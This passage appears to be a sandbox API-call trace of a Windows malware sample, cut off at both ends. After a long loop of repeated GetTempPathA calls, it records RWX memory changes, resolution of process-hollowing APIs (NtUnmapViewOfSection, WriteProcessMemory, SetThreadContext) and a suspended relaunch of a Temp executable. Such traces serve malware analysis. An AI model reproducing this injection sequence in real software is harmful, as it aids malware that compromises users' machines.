| out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.193] VirtualProtect (in: lpAddress=0x1b34e0, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0096.195] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0096.195] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0096.195] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0096.195] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0096.197] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0096.197] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0096.197] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0096.197] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0096.197] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0096.197] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0096.197] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0096.197] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0096.197] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0096.197] RegisterClassExA (param_1=0x12fbc0) returned 0xc13d [0096.197] CreateWindowExA (dwExStyle=0x200, lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x700ce [0096.304] PostMessageA (hWnd=0x700ce, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0096.304] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0096.304] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x150000 [0096.304] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x150000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe")) returned 0x30 [0096.304] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0096.304] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"", lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, dwProcessId=0xb74, dwThreadId=0xb78)) returned 1 [0096.307] VirtualFree (lpAddress=0x150000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.307] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x150000 [0096.307] GetThreadContext (in: hThread=0x48, lpContext=0x150000 | out: lpContext=0x150000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, 